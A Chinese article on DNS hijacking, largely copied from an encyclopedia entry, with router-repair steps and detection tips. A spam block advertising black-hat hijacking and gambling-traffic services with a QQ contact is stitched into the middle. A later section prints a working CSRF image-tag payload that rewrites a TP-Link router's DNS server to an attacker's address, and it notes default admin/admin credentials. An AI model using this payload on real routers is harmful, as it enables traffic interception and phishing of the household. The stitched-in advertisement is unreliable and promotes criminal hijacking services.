DNS(域名系統)的作用是把網路地址(域名,以一個字元串的形式)對應到真實的計算機能夠識別的網路地址(IP地址),以便計算機能夠進一步通信,傳遞網址和內容等。由於域名劫持往往只能在特定的被劫持的網路範圍內進行,所以在此範圍外的域名伺服器(DNS)能夠返回正常的IP地址,高級用戶可以在網路設置把DNS指向這些正常的域名伺服器以實現對網址的正常訪問。所以域名劫持通常相伴的措施——封鎖正常DNS的IP。
如果知道該域名的真實IP地址,則可以直接用此IP代替域名後進行訪問。比如訪問百度域名,可以把訪問改為202.108.22.5,從而繞開域名劫持 。
操作範圍
灰色詞快速排名 百度霸屏推廣 高級黑帽協助 站羣推廣 暴利劫持!
專註於搜索引擎優化快排霸屏,創造意想不到的爆流
ARP欺騙域名解析許可權,沒有限制,一天排名,三天爆流
快照劫持,首頁HTML劫持,流量劫持,搜索引擎劫持,內頁劫持
二級目錄劫持,權重劫持,關鍵詞劫持,會話劫持,蜘蛛劫持
DNS劫持,HOST劫持,HTTP劫持,運營商劫持,病毒式廣告覆蓋
為博彩致力,為夢想而行,讓你不在為流量困惑。
合作諮詢QQ:502526642
應對方法:
DNS劫持(DNS釣魚攻擊)十分兇猛且不容易被用戶感知,曾導致巴西最大銀行巴西銀行近1%客戶受到攻擊而導致賬戶被盜。黑客利用寬頻路由器的缺陷對用戶DNS進行篡改——用戶只要瀏覽一下黑客所掌控的WEB頁面,其寬頻路由器的DNS就會被黑客篡改,因為該WEB頁面設有特別的惡意代碼,所以可以成功躲過安全軟體檢測,導致大量用戶被DNS釣魚詐騙。
由於一些未知原因,在極少數情況下自動修復不成功,建議您手動修改。同時,為了避免再次被攻擊,即使修復成功,用戶也可按照360或騰訊電腦管家提示的方法修改路由器的登錄用戶名和密碼。下面以用戶常用的TP-link路由器為例來說明修改方法(其他品牌路由器與該方法類似)。
手動修改DNS
1.在地址欄中輸入:http://192.168.1.1 (如果頁面不能顯示可嘗試輸入:http://192.168.0.1)
2.填寫您路由器的用戶名和密碼,點擊「確定」
3.在「DHCP伺服器—DHCP」服務中,填寫主DNS伺服器為百度提供的公共DNS服務IP地址:180.76.76.76,備用DNS伺服器為DNSpond提供服務IP為119.29.29.29,點擊保存即可。
修改路由器密碼
1.在地址欄中輸入:http://192.168.1.1 (如果頁面不能顯示可嘗試輸入:http://192.168.0.1)
2.填寫您路由器的用戶名和密碼,路由器初始用戶名為admin,密碼也是admin,如果您修改過,則填寫修改後的用戶名和密碼,點擊「確定」
3.填寫正確後,會進入路由器密碼修改頁面,在系統工具——修改登錄口令頁面即可完成修改(原用戶名和口令和2中填寫的一致)
預防DNS劫持
其實,DNS劫持並不是什麼新鮮事物,也並非無法預防,百度被黑事件的發生再次揭示了全球DNS體系的脆弱性,並說明互聯網廠商如果僅有針對自身信息系統的安全預案,就不足以快速應對全面而複雜的威脅。因此,互聯網公司應採取以下措施:
1、互聯網公司準備兩個以上的域名,一旦黑客進行DNS攻擊,用戶還可以訪問另一個域名。
2、互聯網應該對應急預案進行進一步修正,強化對域名服務商的協調流程。
3、域名註冊商和代理機構特定時期可能成為集中攻擊目標,需要加以防範。
4、國內有關機構之間應該快速建立與境外有關機構的協調和溝通,協助國內企業實現對此事件的快速及時的處理。
DNS劫持變種
上週百度搜索上線了一個非常重要的策略,如果發現有網站被植入惡意篡改用戶路由DNS的代碼時,就會攔截頁面,打出提示!據安全聯盟的統計發現過萬的網站被黑,植入了路由DNS劫持代碼,這個數量非常之大。
過去一段時間,知道創宇安全研究團隊就捕獲了至少5個變種。這類攻擊的模式一般是:
1.攻擊者黑下一批網站;
2.攻擊者往這批網站裏植入路由DNS劫持代碼(各種變形);
3.攻擊者傳播或坐等目標用戶訪問這批網站;
4.用戶訪問這些網站後,瀏覽器就會執行「路由DNS劫持代碼」;
5.用戶的家庭/公司路由器如果存在漏洞就會中招;
6.用戶上網流量被「假DNS伺服器」劫持,並出現奇怪的廣告等現象;
雖然這次攻擊主要針對Tp-Link路由器,不過中招的路由不僅TP-Link!對此安全聯盟推出DNS劫持專題[1] ,為網民及站長提供詳細解決方案。
以上來自百度百科:
那麼瞭解DNS劫持,相信很多做WEBq前端與JAVA後端,以及運維的中都碰見過DNS劫持,那麼有哪些方法以及那麼工具,我一一為你們解答!
第一種:
運行nslookup
如果你當前的DNS伺服器正常工作,返回的結果應該是你自己的DNS伺服器。隨便解析一個網站,比如
http://www.microsoft.com應該返回的是正常的地址然後再解析一個不存在的網站,比如
http://adfasdf.fljalfjsd.com.cn如果返回的結果是DNS request timed out.timeout was 2 seconds.那麼證明你的DNS沒有被劫持如果返回的結果是一個IP地址,比如說網通的返回地址是
http://123.xxx.xxx.xxx,那麼證明你的DNS被劫持了。
請檢查以下設置:
1. 右鍵點擊我的電腦,點擊屬性2. 點擊計算機名3. 點擊其他4. 檢查「此計算機的主DNS後綴」設置,默認情況下這一設置應該是您的域名(比如
http://Microsoft.com)5. 打開網路鏈接6. 右鍵點擊網路鏈接並點擊屬性7. 雙擊TCP/IP8. 點擊高級,並點擊DNS屬性頁9. 檢查「附加主要的連接特定的DNS後綴」選項,默認「附加主DNS後綴的父後綴」是被選中的
10.檢查此連接的DNS後綴內是否設置了內容,默認為空
11.HOSTS文件被修改也會這樣,你可以在C:WindowsSystem32driversetc用記事本打開hosts文件看是否被添加了相關的網址和IP信息,默認的應該只有一個127.0.0.1修復:由於DNS被強制修改,kaspersky不能訪問,可以嘗試其它廠商的在線殺毒。DNS上清理緩存,並執行 ipconfig/flushdns,客戶端上也執行該命令,在測試看看。另:有的時候可以在瀏覽器中直接輸入IP地址,而不是域名。請嘗試!如果IP段被劫持,可以更換IP來解決。或者用360或者電腦管家進行修復,或者電腦急救箱。
第二種:
這篇文章把Dns分為兩種,一種是主機或嵌入式設備dns,一種是網站域名dns,來講述dns淪陷之後帶來的危害。
你本地的網路連接的dns是通過路由器獲取的,假如有一天你家裡的路由被黑客入侵了,入侵者修改了你家裡路由器的dns,那麼他可以對你訪問記錄非常清楚,如系在文件,流量記錄。既然解析都通過dns,我們完全可以自建dns,來進行攻擊。
1.路由器怎麼樣淪陷
攻擊手法:csrf 路由器漏洞
CSRF
IE 出了一個安全補丁,禁止了Http Authentication Url, 使用此方法在IE下攻擊是無效的 完美兼容FF chrome。 https://support.microsoft.com/zh-cn/kb/834489
<img src=http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=惡意的dns地址&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6></img>
設備漏洞
烽火通信某款路由器被爆存在漏洞-可遠程修改DNS
http://www.exploit-db.com/exploits/28450/
2.自建dns(window)
在這裡我使用微軟自家產,(完全可以用其他產品代替,個人習慣問題)